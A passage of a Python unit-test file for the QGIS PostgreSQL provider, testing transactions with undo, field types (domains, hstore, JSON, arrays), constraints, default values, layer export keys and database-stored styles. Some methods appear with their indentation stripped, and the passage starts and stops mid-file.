        self.assertEqual(f['name'], feature['name'])
def testNestedInsert(self):
tg = QgsTransactionGroup()
tg.addLayer(self.vl)
self.vl.startEditing()
it = self.vl.getFeatures()
f = next(it)
f['pk'] = NULL
self.vl.addFeature(f) # Should not deadlock during an active iteration
f = next(it)
def testTimeout(self):
"""
Asserts that we will not deadlock if more iterators are opened in parallel than
available in the connection pool
"""
request = QgsFeatureRequest()
request.setTimeout(1)
iterators = list()
for i in range(100):
iterators.append(self.vl.getFeatures(request))
    def testTransactionDirtyName(self):
        # create a vector layer based on postgres
        vl = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
            'test', 'postgres')
        self.assertTrue(vl.isValid())

        # prepare a project with transactions enabled
        p = QgsProject()
        p.setAutoTransaction(True)
        p.addMapLayers([vl])
        vl.startEditing()

        # update the data within the transaction, passing a custom undo-command name
        tr = vl.dataProvider().transaction()
        sql = "update qgis_test.some_poly_data set pk=1 where pk=1"
        name = "My Awesome Transaction!"
        self.assertTrue(tr.executeSql(sql, True, name)[0])

        # the name given to executeSql must show up as the undo command's text
        self.assertEqual(vl.undoStack().command(0).text(), name)

        # rollback
        vl.rollBack()
    def testTransactionDirty(self):
        # create a vector layer based on postgres
        vl = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
            'test', 'postgres')
        self.assertTrue(vl.isValid())

        # prepare a project with transactions enabled
        p = QgsProject()
        p.setAutoTransaction(True)
        p.addMapLayers([vl])
        vl.startEditing()

        # check that the feature used for testing is ok
        ft0 = vl.getFeatures('pk=1')
        f = QgsFeature()
        self.assertTrue(ft0.nextFeature(f))

        # update the data within the transaction (dirty=True → undoable)
        tr = vl.dataProvider().transaction()
        sql = "update qgis_test.some_poly_data set pk=33 where pk=1"
        self.assertTrue(tr.executeSql(sql, True)[0])

        # check that the pk of the feature has been changed
        ft = vl.getFeatures('pk=1')
        self.assertFalse(ft.nextFeature(f))

        ft = vl.getFeatures('pk=33')
        self.assertTrue(ft.nextFeature(f))

        # the SQL ran with dirty=True, so the layer is tagged as modified
        # and the change participates in the undo stack
        self.assertTrue(vl.isModified())

        # undo sql query
        vl.undoStack().undo()

        # check that the original feature with pk is back
        ft0 = vl.getFeatures('pk=1')
        self.assertTrue(ft0.nextFeature(f))

        # redo
        vl.undoStack().redo()

        # check that the pk of the feature has been changed
        ft1 = vl.getFeatures('pk=1')
        self.assertFalse(ft1.nextFeature(f))
    def testTransactionConstraints(self):
        # create a vector layer based on postgres
        vl = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'id\' table="qgis_test"."check_constraints" sql=',
                            'test', 'postgres')
        self.assertTrue(vl.isValid())

        # prepare a project with transactions enabled
        p = QgsProject()
        p.setAutoTransaction(True)
        p.addMapLayers([vl])

        # get feature
        f = QgsFeature()
        self.assertTrue(vl.getFeatures('id=1').nextFeature(f))
        self.assertEqual(f.attributes(), [1, 4, 3])

        # start edition
        vl.startEditing()

        # update attribute form with a failing constraints
        # coming from the database if attributes are updated
        # one at a time.
        # Current feature: a = 4 / b = 3
        # Update feature: a = 1 / b = 0
        # If updated one at a time, '(a = 1) < (b = 3)' => FAIL!
        form = QgsAttributeForm(vl, f)
        for w in form.findChildren(QLabel):
            if w.buddy():
                spinBox = w.buddy()
                if w.text() == 'a':
                    spinBox.setValue(1)
                elif w.text() == 'b':
                    spinBox.setValue(0)

        # save: both attributes must be committed together so the
        # database CHECK constraint is evaluated on the final state
        form.save()

        # check new values
        self.assertTrue(vl.getFeatures('id=1').nextFeature(f))
        self.assertEqual(f.attributes(), [1, 1, 0])
def testTransactionTuple(self):
# create a vector layer based on postgres
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
# prepare a project with transactions enabled
p = QgsProject()
p.setAutoTransaction(True)
p.addMapLayers([vl])
vl.startEditing()
# execute a query which returns a tuple
tr = vl.dataProvider().transaction()
sql = "select * from qgis_test.some_poly_data"
self.assertTrue(tr.executeSql(sql, False)[0])
# underlying data has not been modified
self.assertFalse(vl.isModified())
    def testDomainTypes(self):
        """Test that domain types are correctly mapped"""

        vl = QgsVectorLayer('%s table="qgis_test"."domains" sql=' %
                            (self.dbconn), "domains", "postgres")
        self.assertTrue(vl.isValid())

        fields = vl.dataProvider().fields()

        # expected QVariant type, provider type name and length per domain field;
        # length -1 means "unbounded" for the unconstrained varchar/text domains
        expected = {}
        expected['fld_var_char_domain'] = {'type': QVariant.String, 'typeName': 'qgis_test.var_char_domain',
                                           'length': -1}
        expected['fld_var_char_domain_6'] = {'type': QVariant.String, 'typeName': 'qgis_test.var_char_domain_6',
                                             'length': 6}
        expected['fld_character_domain'] = {'type': QVariant.String, 'typeName': 'qgis_test.character_domain',
                                            'length': 1}
        expected['fld_character_domain_6'] = {'type': QVariant.String, 'typeName': 'qgis_test.character_domain_6',
                                              'length': 6}
        expected['fld_char_domain'] = {
            'type': QVariant.String, 'typeName': 'qgis_test.char_domain', 'length': 1}
        expected['fld_char_domain_6'] = {
            'type': QVariant.String, 'typeName': 'qgis_test.char_domain_6', 'length': 6}
        expected['fld_text_domain'] = {
            'type': QVariant.String, 'typeName': 'qgis_test.text_domain', 'length': -1}
        expected['fld_numeric_domain'] = {'type': QVariant.Double, 'typeName': 'qgis_test.numeric_domain', 'length': 10,
                                          'precision': 4}

        for f, e in list(expected.items()):
            self.assertEqual(
                fields.at(fields.indexFromName(f)).type(), e['type'])
            self.assertEqual(fields.at(fields.indexFromName(f)
                                       ).typeName(), e['typeName'])
            self.assertEqual(
                fields.at(fields.indexFromName(f)).length(), e['length'])
            # precision is only meaningful for the numeric domain
            if 'precision' in e:
                self.assertEqual(
                    fields.at(fields.indexFromName(f)).precision(), e['precision'])
    def testRenameAttributes(self):
        ''' Test renameAttributes() '''
        vl = QgsVectorLayer('%s table="qgis_test"."rename_table" sql=' % (
            self.dbconn), "renames", "postgres")
        provider = vl.dataProvider()
        # reset field names to a known baseline (result deliberately unchecked:
        # depending on prior runs the columns may already carry these names)
        provider.renameAttributes({1: 'field1', 2: 'field2'})

        # bad rename
        self.assertFalse(provider.renameAttributes({-1: 'not_a_field'}))
        self.assertFalse(provider.renameAttributes({100: 'not_a_field'}))
        # already exists
        self.assertFalse(provider.renameAttributes({1: 'field2'}))

        # rename one field
        self.assertTrue(provider.renameAttributes({1: 'newname'}))
        self.assertEqual(provider.fields().at(1).name(), 'newname')
        vl.updateFields()
        fet = next(vl.getFeatures())
        self.assertEqual(fet.fields()[1].name(), 'newname')

        # rename two fields
        self.assertTrue(provider.renameAttributes(
            {1: 'newname2', 2: 'another'}))
        self.assertEqual(provider.fields().at(1).name(), 'newname2')
        self.assertEqual(provider.fields().at(2).name(), 'another')
        vl.updateFields()
        fet = next(vl.getFeatures())
        self.assertEqual(fet.fields()[1].name(), 'newname2')
        self.assertEqual(fet.fields()[2].name(), 'another')

        # close layer and reopen, then recheck to confirm that changes were saved to db
        del vl
        vl = None
        vl = QgsVectorLayer('%s table="qgis_test"."rename_table" sql=' % (
            self.dbconn), "renames", "postgres")
        provider = vl.dataProvider()
        self.assertEqual(provider.fields().at(1).name(), 'newname2')
        self.assertEqual(provider.fields().at(2).name(), 'another')
        fet = next(vl.getFeatures())
        self.assertEqual(fet.fields()[1].name(), 'newname2')
        self.assertEqual(fet.fields()[2].name(), 'another')
def testEditorWidgetTypes(self):
"""Test that editor widget types can be fetched from the qgis_editor_widget_styles table"""
vl = QgsVectorLayer('%s table="qgis_test"."widget_styles" sql=' % (
self.dbconn), "widget_styles", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
setup1 = fields.field("fld1").editorWidgetSetup()
self.assertFalse(setup1.isNull())
self.assertEqual(setup1.type(), "FooEdit")
self.assertEqual(setup1.config(), {"param1": "value1", "param2": "2"})
best1 = QgsGui.editorWidgetRegistry().findBest(vl, "fld1")
self.assertEqual(best1.type(), "FooEdit")
self.assertEqual(best1.config(), setup1.config())
self.assertTrue(fields.field("fld2").editorWidgetSetup().isNull())
best2 = QgsGui.editorWidgetRegistry().findBest(vl, "fld2")
self.assertEqual(best2.type(), "TextEdit")
    def testHstore(self):
        """hstore columns must map to QVariant.Map and round-trip dict values (incl. quoting edge cases)."""
        vl = QgsVectorLayer('%s table="qgis_test"."dict" sql=' %
                            (self.dbconn), "testhstore", "postgres")
        self.assertTrue(vl.isValid())

        fields = vl.dataProvider().fields()
        self.assertEqual(
            fields.at(fields.indexFromName('value')).type(), QVariant.Map)

        f = next(vl.getFeatures(QgsFeatureRequest()))

        value_idx = vl.fields().lookupField('value')
        self.assertIsInstance(f.attributes()[value_idx], dict)
        self.assertEqual(f.attributes()[value_idx], {'a': 'b', '1': '2'})

        # insert a dict whose values exercise hstore escaping: quotes and backslash
        new_f = QgsFeature(vl.fields())
        new_f['pk'] = NULL
        new_f['value'] = {'simple': '1', 'doubleQuote': '"y"',
                          'quote': "'q'", 'backslash': '\\'}
        r, fs = vl.dataProvider().addFeatures([new_f])
        self.assertTrue(r)
        new_pk = fs[0]['pk']
        self.assertNotEqual(new_pk, NULL, fs[0].attributes())

        # read back and verify, then always clean up the inserted row
        try:
            read_back = vl.getFeature(new_pk)
            self.assertEqual(read_back['pk'], new_pk)
            self.assertEqual(read_back['value'], new_f['value'])
        finally:
            self.assertTrue(vl.startEditing())
            self.assertTrue(vl.deleteFeatures([new_pk]))
            self.assertTrue(vl.commitChanges())
    def testJson(self):
        """json/jsonb columns must round-trip scalars, arrays and nested objects through add/change/changeFeatures."""
        vl = QgsVectorLayer('%s table="qgis_test"."json" sql=' %
                            (self.dbconn), "testjson", "postgres")
        self.assertTrue(vl.isValid())

        # first set of values: each one is written to both the json and the jsonb column
        attrs = (
            123,
            1233.45,
            None,
            True,
            False,
            r"String literal with \"quotes\" 'and' other funny chars []{};#/èé*",
            [1, 2, 3.4, None],
            [True, False],
            {'a': 123, 'b': 123.34, 'c': 'a string', 'd': [
                1, 2, 3], 'e': {'a': 123, 'b': 123.45}}
        )
        # second set, used to exercise changeFeatures() below
        attrs2 = (
            246,
            2466.91,
            None,
            True,
            False,
            r"Yet another string literal with \"quotes\" 'and' other funny chars: π []{};#/èé*",
            [2, 4, 3.14159, None],
            [True, False],
            {'a': 246, 'b': 246.68, 'c': 'a rounded area: π × r²', 'd': [
                1, 2, 3], 'e': {'a': 246, 'b': 246.91}}
        )
        json_idx = vl.fields().lookupField('jvalue')
        jsonb_idx = vl.fields().lookupField('jbvalue')

        for attr in attrs:
            # Add a new feature
            vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
                self.dbconn), "testjson", "postgres")
            self.assertTrue(vl2.startEditing())
            f = QgsFeature(vl2.fields())
            f.setAttributes([None, attr, attr])
            self.assertTrue(vl2.addFeatures([f]))
            self.assertTrue(vl2.commitChanges(), attr)
            # Read back (a fresh layer each time ensures nothing is served from cache)
            vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
                self.dbconn), "testjson", "postgres")
            fid = [f.id() for f in vl2.getFeatures()][-1]
            f = vl2.getFeature(fid)
            self.assertEqual(f.attributes(), [fid, attr, attr])
            # Change attribute values
            vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
                self.dbconn), "testjson", "postgres")
            fid = [f.id() for f in vl2.getFeatures()][-1]
            self.assertTrue(vl2.startEditing())
            self.assertTrue(vl2.changeAttributeValues(
                fid, {json_idx: attr, jsonb_idx: attr}))
            self.assertTrue(vl2.commitChanges())
            # Read back
            vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
                self.dbconn), "testjson", "postgres")
            f = vl2.getFeature(fid)
            self.assertEqual(f.attributes(), [fid, attr, attr])

        # Let's check changeFeatures:
        for attr in attrs2:
            vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
                self.dbconn), "testjson", "postgres")
            fid = [f.id() for f in vl2.getFeatures()][-1]
            self.assertTrue(vl2.startEditing())
            self.assertTrue(vl2.dataProvider().changeFeatures({fid: {json_idx: attr, jsonb_idx: attr}}, {}))
            self.assertTrue(vl2.commitChanges())

            # Read back again
            vl2 = QgsVectorLayer('%s table="qgis_test"."json" sql=' % (
                self.dbconn), "testjson", "postgres")
            f = vl2.getFeature(fid)
            self.assertEqual(f.attributes(), [fid, attr, attr])
    def testStringArray(self):
        """text[] columns must map to QVariant.StringList and round-trip values (incl. quoting edge cases)."""
        vl = QgsVectorLayer('%s table="qgis_test"."string_array" sql=' % (
            self.dbconn), "teststringarray", "postgres")
        self.assertTrue(vl.isValid())

        fields = vl.dataProvider().fields()
        self.assertEqual(fields.at(fields.indexFromName(
            'value')).type(), QVariant.StringList)
        self.assertEqual(fields.at(fields.indexFromName(
            'value')).subType(), QVariant.String)

        f = next(vl.getFeatures(QgsFeatureRequest()))

        value_idx = vl.fields().lookupField('value')
        self.assertIsInstance(f.attributes()[value_idx], list)
        self.assertEqual(f.attributes()[value_idx], ['a', 'b', 'c'])

        # insert an array whose elements exercise array-literal escaping
        new_f = QgsFeature(vl.fields())
        new_f['pk'] = NULL
        new_f['value'] = ['simple', '"doubleQuote"', "'quote'", 'back\\slash']
        r, fs = vl.dataProvider().addFeatures([new_f])
        self.assertTrue(r)
        new_pk = fs[0]['pk']
        self.assertNotEqual(new_pk, NULL, fs[0].attributes())

        # read back and verify, then always clean up the inserted row
        try:
            read_back = vl.getFeature(new_pk)
            self.assertEqual(read_back['pk'], new_pk)
            self.assertEqual(read_back['value'], new_f['value'])
        finally:
            self.assertTrue(vl.startEditing())
            self.assertTrue(vl.deleteFeatures([new_pk]))
            self.assertTrue(vl.commitChanges())
def testIntArray(self):
vl = QgsVectorLayer('%s table="qgis_test"."int_array" sql=' % (
self.dbconn), "testintarray", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(
fields.at(fields.indexFromName('value')).type(), QVariant.List)
self.assertEqual(fields.at(fields.indexFromName(
'value')).subType(), QVariant.Int)
f = next(vl.getFeatures(QgsFeatureRequest()))
value_idx = vl.fields().lookupField('value')
self.assertIsInstance(f.attributes()[value_idx], list)
self.assertEqual(f.attributes()[value_idx], [1, 2, -5])
def testDoubleArray(self):
vl = QgsVectorLayer('%s table="qgis_test"."double_array" sql=' % (
self.dbconn), "testdoublearray", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(
fields.at(fields.indexFromName('value')).type(), QVariant.List)
self.assertEqual(fields.at(fields.indexFromName(
'value')).subType(), QVariant.Double)
f = next(vl.getFeatures(QgsFeatureRequest()))
value_idx = vl.fields().lookupField('value')
self.assertIsInstance(f.attributes()[value_idx], list)
self.assertEqual(f.attributes()[value_idx], [1.1, 2, -5.12345])
    def testNotNullConstraint(self):
        """NOT NULL constraints must be reported by the provider and propagated to the layer fields."""
        vl = QgsVectorLayer('%s table="qgis_test"."constraints" sql=' % (
            self.dbconn), "constraints", "postgres")
        self.assertTrue(vl.isValid())
        self.assertEqual(len(vl.fields()), 4)

        # test some bad field indexes: out-of-range indexes return empty constraint flags
        self.assertEqual(vl.dataProvider().fieldConstraints(-1),
                         QgsFieldConstraints.Constraints())
        self.assertEqual(vl.dataProvider().fieldConstraints(
            1001), QgsFieldConstraints.Constraints())

        # fields 0 and 2 are NOT NULL in the test schema, fields 1 and 3 are nullable
        self.assertTrue(vl.dataProvider().fieldConstraints(0) &
                        QgsFieldConstraints.ConstraintNotNull)
        self.assertFalse(vl.dataProvider().fieldConstraints(1)
                         & QgsFieldConstraints.ConstraintNotNull)
        self.assertTrue(vl.dataProvider().fieldConstraints(2) &
                        QgsFieldConstraints.ConstraintNotNull)
        self.assertFalse(vl.dataProvider().fieldConstraints(3)
                         & QgsFieldConstraints.ConstraintNotNull)

        # test that constraints have been saved to fields correctly,
        # with the provider recorded as the constraint origin
        fields = vl.fields()
        self.assertTrue(fields.at(0).constraints().constraints()
                        & QgsFieldConstraints.ConstraintNotNull)
        self.assertEqual(fields.at(0).constraints().constraintOrigin(QgsFieldConstraints.ConstraintNotNull),
                         QgsFieldConstraints.ConstraintOriginProvider)
        self.assertFalse(fields.at(1).constraints().constraints()
                         & QgsFieldConstraints.ConstraintNotNull)
        self.assertTrue(fields.at(2).constraints().constraints()
                        & QgsFieldConstraints.ConstraintNotNull)
        self.assertEqual(fields.at(2).constraints().constraintOrigin(QgsFieldConstraints.ConstraintNotNull),
                         QgsFieldConstraints.ConstraintOriginProvider)
        self.assertFalse(fields.at(3).constraints().constraints()
                         & QgsFieldConstraints.ConstraintNotNull)
def testUniqueConstraint(self):
vl = QgsVectorLayer('%s table="qgis_test"."constraints" sql=' % (
self.dbconn), "constraints", "postgres")
self.assertTrue(vl.isValid())
self.assertEqual(len(vl.fields()), 4)
# test some bad field indexes
self.assertEqual(vl.dataProvider().fieldConstraints(-1),
QgsFieldConstraints.Constraints())
self.assertEqual(vl.dataProvider().fieldConstraints(
1001), QgsFieldConstraints.Constraints())
self.assertTrue(vl.dataProvider().fieldConstraints(0)
& QgsFieldConstraints.ConstraintUnique)
self.assertTrue(vl.dataProvider().fieldConstraints(1)
& QgsFieldConstraints.ConstraintUnique)
self.assertTrue(vl.dataProvider().fieldConstraints(2)
& QgsFieldConstraints.ConstraintUnique)
self.assertFalse(vl.dataProvider().fieldConstraints(3)
& QgsFieldConstraints.ConstraintUnique)
# test that constraints have been saved to fields correctly
fields = vl.fields()
self.assertTrue(fields.at(0).constraints().constraints()
& QgsFieldConstraints.ConstraintUnique)
self.assertEqual(fields.at(0).constraints().constraintOrigin(QgsFieldConstraints.ConstraintUnique),
QgsFieldConstraints.ConstraintOriginProvider)
self.assertTrue(fields.at(1).constraints().constraints()
& QgsFieldConstraints.ConstraintUnique)
self.assertEqual(fields.at(1).constraints().constraintOrigin(QgsFieldConstraints.ConstraintUnique),
QgsFieldConstraints.ConstraintOriginProvider)
self.assertTrue(fields.at(2).constraints().constraints()
& QgsFieldConstraints.ConstraintUnique)
self.assertEqual(fields.at(2).constraints().constraintOrigin(QgsFieldConstraints.ConstraintUnique),
QgsFieldConstraints.ConstraintOriginProvider)
self.assertFalse(fields.at(3).constraints().constraints()
& QgsFieldConstraints.ConstraintUnique)
def testConstraintOverwrite(self):
""" test that Postgres provider constraints can't be overwritten by vector layer method """
vl = QgsVectorLayer('%s table="qgis_test"."constraints" sql=' % (
self.dbconn), "constraints", "postgres")
self.assertTrue(vl.isValid())
self.assertTrue(vl.dataProvider().fieldConstraints(0) &
QgsFieldConstraints.ConstraintNotNull)
self.assertTrue(vl.fields().at(0).constraints().constraints()
& QgsFieldConstraints.ConstraintNotNull)
# add a constraint at the layer level
vl.setFieldConstraint(0, QgsFieldConstraints.ConstraintUnique)
# should be no change at provider level
self.assertTrue(vl.dataProvider().fieldConstraints(0) &
QgsFieldConstraints.ConstraintNotNull)
# but layer should still keep provider constraints...
self.assertTrue(vl.fields().at(0).constraints().constraints()
& QgsFieldConstraints.ConstraintNotNull)
self.assertTrue(vl.fieldConstraints(
0) & QgsFieldConstraints.ConstraintNotNull)
# ...in addition to layer level constraint
self.assertTrue(vl.fields().at(0).constraints(
).constraints() & QgsFieldConstraints.ConstraintUnique)
self.assertTrue(vl.fieldConstraints(
0) & QgsFieldConstraints.ConstraintUnique)
def testVectorLayerUtilsUniqueWithProviderDefault(self):
vl = QgsVectorLayer('%s table="qgis_test"."someData" sql=' %
(self.dbconn), "someData", "postgres")
default_clause = 'nextval(\'qgis_test."someData_pk_seq"\'::regclass)'
vl.dataProvider().setProviderProperty(
QgsDataProvider.EvaluateDefaultValues, False)
self.assertEqual(
vl.dataProvider().defaultValueClause(0), default_clause)
self.assertTrue(QgsVectorLayerUtils.valueExists(vl, 0, 4))
vl.startEditing()
f = QgsFeature(vl.fields())
f.setAttribute(0, default_clause)
self.assertFalse(
QgsVectorLayerUtils.valueExists(vl, 0, default_clause))
self.assertTrue(vl.addFeatures([f]))
# the default value clause should exist...
self.assertTrue(QgsVectorLayerUtils.valueExists(vl, 0, default_clause))
# but it should not prevent the attribute being validated
self.assertTrue(QgsVectorLayerUtils.validateAttribute(vl, f, 0))
vl.rollBack()
def testSkipConstraintCheck(self):
vl = QgsVectorLayer('%s table="qgis_test"."someData" sql=' %
(self.dbconn), "someData", "postgres")
default_clause = 'nextval(\'qgis_test."someData_pk_seq"\'::regclass)'
vl.dataProvider().setProviderProperty(
QgsDataProvider.EvaluateDefaultValues, False)
self.assertTrue(vl.dataProvider().skipConstraintCheck(
0, QgsFieldConstraints.ConstraintUnique, default_clause))
self.assertFalse(vl.dataProvider().skipConstraintCheck(
0, QgsFieldConstraints.ConstraintUnique, 59))
def testVectorLayerUtilsCreateFeatureWithProviderDefault(self):
vl = QgsVectorLayer('%s table="qgis_test"."someData" sql=' %
(self.dbconn), "someData", "postgres")
default_clause = 'nextval(\'qgis_test."someData_pk_seq"\'::regclass)'
self.assertEqual(
vl.dataProvider().defaultValueClause(0), default_clause)
# If an attribute map is provided, QgsVectorLayerUtils.createFeature must
# respect it, otherwise default values from provider are checked.
# User's choice will not be respected if the value violates unique constraints.
# See https://github.com/qgis/QGIS/issues/27758
f = QgsVectorLayerUtils.createFeature(vl, attributes={1: 5, 3: 'map'})
# changed so that createFeature respects user choice
self.assertEqual(f.attributes(), [
default_clause, 5, "'qgis'::text", 'map', None, None, None, None, None])
vl.setDefaultValueDefinition(3, QgsDefaultValue("'mappy'"))
# test ignore vector layer default value expression overrides postgres provider default clause,
# due to user's choice
f = QgsVectorLayerUtils.createFeature(vl, attributes={1: 5, 3: 'map'})
self.assertEqual(f.attributes(), [
default_clause, 5, "'qgis'::text", 'map', None, None, None, None, None])
# Since user did not enter a default for field 3, test must return the default value chosen
f = QgsVectorLayerUtils.createFeature(vl, attributes={1: 5})
self.assertEqual(f.attributes(), [
default_clause, 5, "'qgis'::text", 'mappy', None, None, None, None, None])
# See https://github.com/qgis/QGIS/issues/23127
def testNumericPrecision(self):
uri = 'point?field=f1:int'
uri += '&field=f2:double(6,4)'
uri += '&field=f3:string(20)'
lyr = QgsVectorLayer(uri, "x", "memory")
self.assertTrue(lyr.isValid())
f = QgsFeature(lyr.fields())
f['f1'] = 1
f['f2'] = 123.456
f['f3'] = '12345678.90123456789'
lyr.dataProvider().addFeatures([f])
uri = '%s table="qgis_test"."b18155" (g) key=\'f1\'' % (self.dbconn)
self.execSQLCommand('DROP TABLE IF EXISTS qgis_test.b18155')
err = QgsVectorLayerExporter.exportLayer(
lyr, uri, "postgres", lyr.crs())
self.assertEqual(err[0], QgsVectorLayerExporter.NoError,
'unexpected import error {0}'.format(err))
lyr = QgsVectorLayer(uri, "y", "postgres")
self.assertTrue(lyr.isValid())
f = next(lyr.getFeatures())
self.assertEqual(f['f1'], 1)
self.assertEqual(f['f2'], 123.456)
self.assertEqual(f['f3'], '12345678.90123456789')
    # See https://github.com/qgis/QGIS/issues/23163
    def testImportKey(self):
        """Export a memory layer to PostgreSQL with various 'key' URI options
        and verify which columns end up forming the primary key."""
        uri = 'point?field=f1:int'
        uri += '&field=F2:double(6,4)'
        uri += '&field=f3:string(20)'
        lyr = QgsVectorLayer(uri, "x", "memory")
        self.assertTrue(lyr.isValid())
        def testKey(lyr, key, kfnames):
            # Export `lyr` into qgis_test.import_test using the given `key`
            # option (no key option at all when None) and assert that the
            # resulting primary key fields match `kfnames`, in order.
            self.execSQLCommand('DROP TABLE IF EXISTS qgis_test.import_test')
            uri = '%s table="qgis_test"."import_test" (g)' % self.dbconn
            if key is not None:
                uri += ' key=\'%s\'' % key
            err = QgsVectorLayerExporter.exportLayer(
                lyr, uri, "postgres", lyr.crs())
            self.assertEqual(err[0], QgsVectorLayerExporter.NoError,
                             'unexpected import error {0}'.format(err))
            olyr = QgsVectorLayer(uri, "y", "postgres")
            self.assertTrue(olyr.isValid())
            flds = lyr.fields()
            oflds = olyr.fields()
            if key is None:
                # if the pkey was not given, it will create a pkey
                self.assertEqual(oflds.size(), flds.size() + 1)
                self.assertEqual(oflds[0].name(), kfnames[0])
                for i in range(flds.size()):
                    self.assertEqual(oflds[i + 1].name(), flds[i].name())
            else:
                # pkey was given, no extra field generated
                self.assertEqual(oflds.size(), flds.size())
                for i in range(oflds.size()):
                    self.assertEqual(oflds[i].name(), flds[i].name())
            pks = olyr.primaryKeyAttributes()
            self.assertEqual(len(pks), len(kfnames))
            # the detected key columns must match the expected names, in order
            for i in range(0, len(kfnames)):
                self.assertEqual(oflds[pks[i]].name(), kfnames[i])
        # single, quoted and compound keys (note the upper-case "F2" column)
        testKey(lyr, 'f1', ['f1'])
        testKey(lyr, '"f1"', ['f1'])
        testKey(lyr, '"f1","F2"', ['f1', 'F2'])
        testKey(lyr, '"f1","F2","f3"', ['f1', 'F2', 'f3'])
        # no key given: an 'id' primary key column is auto-generated
        testKey(lyr, None, ['id'])
    # See https://github.com/qgis/QGIS/issues/25415
    def testImportWithoutSchema(self):
        """Export a memory layer to PostgreSQL with and without an explicit
        schema in the destination URI; a wrong schema must fail."""
        def _test(table, schema=None):
            # Export a 3-field memory layer into `table` (schema-qualified
            # when `schema` is given) and assert the round-tripped layer is
            # valid.
            self.execSQLCommand('DROP TABLE IF EXISTS %s CASCADE' % table)
            uri = 'point?field=f1:int'
            uri += '&field=F2:double(6,4)'
            uri += '&field=f3:string(20)'
            lyr = QgsVectorLayer(uri, "x", "memory")
            self.assertTrue(lyr.isValid())
            table = ("%s" % table) if schema is None else (
                "\"%s\".\"%s\"" % (schema, table))
            dest_uri = "%s sslmode=disable table=%s (geom) sql" % (
                self.dbconn, table)
            QgsVectorLayerExporter.exportLayer(
                lyr, dest_uri, "postgres", lyr.crs())
            olyr = QgsVectorLayer(dest_uri, "y", "postgres")
            self.assertTrue(olyr.isValid(), "Failed URI: %s" % dest_uri)
        # Test bug 17518
        _test('b17518')
        # Test fully qualified table (with schema)
        _test("b17518", "qgis_test")
        # Test empty schema
        _test("b17518", "")
        # Test public schema
        _test("b17518", "public")
        # Test fully qualified table (with wrong schema)
        with self.assertRaises(AssertionError):
            _test("b17518", "qgis_test_wrong")
    def testStyle(self):
        """Exercise the save/load/list/delete style-in-database API, starting
        from a missing layer_styles table and ending with an empty one."""
        self.execSQLCommand('DROP TABLE IF EXISTS layer_styles CASCADE')
        vl = self.getEditableLayer()
        self.assertTrue(vl.isValid())
        self.assertTrue(
            vl.dataProvider().isSaveAndLoadStyleToDatabaseSupported())
        self.assertTrue(vl.dataProvider().isDeleteStyleFromDatabaseSupported())
        # table layer_styles does not exist yet: listing must fail with -1
        related_count, idlist, namelist, desclist, errmsg = vl.listStylesInDatabase()
        self.assertEqual(related_count, -1)
        self.assertEqual(idlist, [])
        self.assertEqual(namelist, [])
        self.assertEqual(desclist, [])
        self.assertNotEqual(errmsg, "")
        # fetching any style id must also fail while the table is missing
        qml, errmsg = vl.getStyleFromDatabase("1")
        self.assertEqual(qml, "")
        self.assertNotEqual(errmsg, "")
        mFilePath = QDir.toNativeSeparators(
            '%s/symbol_layer/%s.qml' % (unitTestDataPath(), "singleSymbol"))
        status = vl.loadNamedStyle(mFilePath)
        self.assertTrue(status)
        # The style is saved as non-default
        errorMsg = vl.saveStyleToDatabase(
            "by day", "faded greens and elegant patterns", False, "")
        self.assertEqual(errorMsg, "")
        # the style id should be "1", not "by day"
        qml, errmsg = vl.getStyleFromDatabase("by day")
        self.assertEqual(qml, "")
        self.assertNotEqual(errmsg, "")
        related_count, idlist, namelist, desclist, errmsg = vl.listStylesInDatabase()
        self.assertEqual(related_count, 1)
        self.assertEqual(errmsg, "")
        self.assertEqual(idlist, ["1"])
        self.assertEqual(namelist, ["by day"])
        self.assertEqual(desclist, ["faded greens and elegant patterns"])
        # an unknown id returns an empty style plus an error message
        qml, errmsg = vl.getStyleFromDatabase("100")
        self.assertEqual(qml, "")
        self.assertNotEqual(errmsg, "")
        # the known id returns the stored QML document
        qml, errmsg = vl.getStyleFromDatabase("1")
        self.assertTrue(qml.startswith('<!DOCTYPE qgis'), qml)
        self.assertEqual(errmsg, "")
        # NOTE(review): deleting a non-existent id reports success here
        res, errmsg = vl.deleteStyleFromDatabase("100")
        self.assertTrue(res)
        self.assertEqual(errmsg, "")
        res, errmsg = vl.deleteStyleFromDatabase("1")
        self.assertTrue(res)
        self.assertEqual(errmsg, "")
        # We save now the style again twice but with one as default
        errorMsg = vl.saveStyleToDatabase(
            "related style", "faded greens and elegant patterns", False, "")
        self.assertEqual(errorMsg, "")
        errorMsg = vl.saveStyleToDatabase(
            "default style", "faded greens and elegant patterns", True, "")
        self.assertEqual(errorMsg, "")
        related_count, idlist, namelist, desclist, errmsg = vl.listStylesInDatabase()
        self.assertEqual(related_count, 2)
        self.assertEqual(errmsg, "")
        self.assertEqual(idlist, ["3", "2"]) # Ids must be reversed.
        self.assertEqual(namelist, ["default style", "related style"])
        self.assertEqual(desclist, ["faded greens and elegant patterns"] * 2)
        # We remove these 2 styles
        res, errmsg = vl.deleteStyleFromDatabase("2")
        self.assertTrue(res)
        self.assertEqual(errmsg, "")
        res, errmsg = vl.deleteStyleFromDatabase("3")
        self.assertTrue(res)
        self.assertEqual(errmsg, "")
        # table layer_styles does exist now, but is empty again
        related_count, idlist, namelist, desclist, errmsg = vl.listStylesInDatabase()
        self.assertEqual(related_count, 0)
        self.assertEqual(idlist, [])
        self.assertEqual(namelist, [])
        self.assertEqual(desclist, [])
        self.assertEqual(errmsg, "")
def testStyleWithGeometryType(self):
